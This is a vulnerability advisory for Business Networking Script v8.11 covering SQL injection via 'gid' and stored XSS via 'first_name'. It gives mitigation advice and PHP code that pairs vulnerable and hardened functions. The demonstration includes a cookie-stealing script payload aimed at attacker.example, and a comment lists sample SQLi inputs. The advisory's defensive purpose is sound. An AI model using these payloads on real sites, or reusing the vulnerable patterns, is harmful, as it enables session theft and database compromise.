Vendor: Business Networking Script
By: Ahmet Gurel
CVSS: 5.5 (MEDIUM)
Vulnerability Type: SQL Injection & Persistent Cross Site Scripting
CWE: 89
Product Name: Business Networking Script
Affected Version From: 8.11
Affected Version To: 8.11
Patch Exists: NO
Related CWE:
CPE: a:itechscripts:business_networking_script:8.11
Platforms Tested: PHP
Year: 2017
Business Networking Script v8.11 - SQLi & Persistent Cross Site Scripting
Business Networking Script v8.11 is vulnerable to SQL Injection and Persistent (stored) Cross Site Scripting. The SQL Injection is reachable through the 'gid' parameter of the 'show_group_members.php' page, where the supplied value reaches a database query without validation or parameterization; an attacker who sends a crafted 'gid' value can execute arbitrary SQL queries against the application database. The Persistent XSS is in the 'home.php' page via the 'first_name' parameter: a script payload submitted as a first name is stored by the application and later rendered without output encoding, so it executes in the browser of every user who views the affected page. No vendor patch was available at the time of publication.
Mitigation:
To mitigate the SQL Injection, validate 'gid' against the type it is expected to be (typically a numeric group identifier) and pass it to the database through a prepared statement with bound parameters instead of string concatenation. To mitigate the Persistent XSS, restrict what a first name may contain on input and, because a malicious value may already be stored, encode every output of 'first_name' for its HTML context (e.g. htmlspecialchars in PHP) at render time; input filtering alone does not clean records saved before the fix. Until a vendor patch is available, operators can additionally reject requests with non-numeric 'gid' values at a web application firewall or reverse proxy and audit existing user profiles for stored script payloads.
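The two vulnerable patterns described above, each beside the hardened form the mitigation calls for, as an added PHP example. This is illustrative code written for this page, not the vendor's source; the mysqli connection, the table and column names (group_members, users, user_id, first_name) and the function names are assumptions.

```php
<?php
// Added example (not the vendor's code). Assumptions: a mysqli connection $db,
// a hypothetical 'group_members' table joined to a hypothetical 'users' table
// that has a 'first_name' column.

// --- 1. SQL injection through an unvalidated 'gid' (show_group_members.php style) ---

// VULNERABLE: the request parameter is concatenated straight into the query.
// gid=1 OR 1=1 lists every member; gid=1 UNION SELECT ... reads other tables.
function listMembersVulnerable(mysqli $db, string $gid): array {
    $sql = "SELECT u.user_id, u.first_name FROM group_members gm
            JOIN users u ON u.user_id = gm.user_id
            WHERE gm.group_id = " . $gid;          // injection point
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

// HARDENED: validate the type (a group id is a positive integer) and bind it as a
// parameter, so the value can never alter the structure of the query.
function listMembersSafe(mysqli $db, string $gid): array {
    $id = filter_var($gid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare("SELECT u.user_id, u.first_name FROM group_members gm
                          JOIN users u ON u.user_id = gm.user_id
                          WHERE gm.group_id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// --- 2. Persistent XSS through a stored 'first_name' rendered on home.php ---

// VULNERABLE: the stored value is echoed into HTML unchanged. A first_name of
// <script>...</script> saved once runs for every user who views the page.
function renderGreetingVulnerable(string $firstName): string {
    return "<h2>Welcome, " . $firstName . "</h2>";
}

// HARDENED: encode at the point of output for the HTML context. ENT_QUOTES also
// covers attribute contexts; naming the charset keeps the encoder from being
// confused by malformed byte sequences. This also neutralises values stored
// before the fix, which input validation alone would not.
function renderGreetingSafe(string $firstName): string {
    return "<h2>Welcome, "
        . htmlspecialchars($firstName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . "</h2>";
}

// Input-side check applied when the profile is saved: reject names that cannot be
// legitimate instead of trying to strip tags (tag stripping is bypassable).
function validFirstName(string $name): bool {
    return (bool) preg_match('/^[\p{L}\p{M}\'\- ]{1,50}$/u', $name);
}

// Demonstration with a constructed payload; the XSS half needs no database.
$payload = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
echo renderGreetingVulnerable($payload), PHP_EOL;   // script tag reaches the browser intact
echo renderGreetingSafe($payload), PHP_EOL;         // rendered as harmless text
var_dump(validFirstName($payload));
var_dump(validFirstName('Ahmet'));
```

The SQL half deliberately keeps both validation and binding: the integer check rejects garbage early with a 400, while the bound parameter is the control that actually prevents injection, so a future column of a different type stays safe if the validation is loosened. For the XSS half, encoding belongs at every output site of the field, not only on home.php, since the same stored value is likely rendered elsewhere.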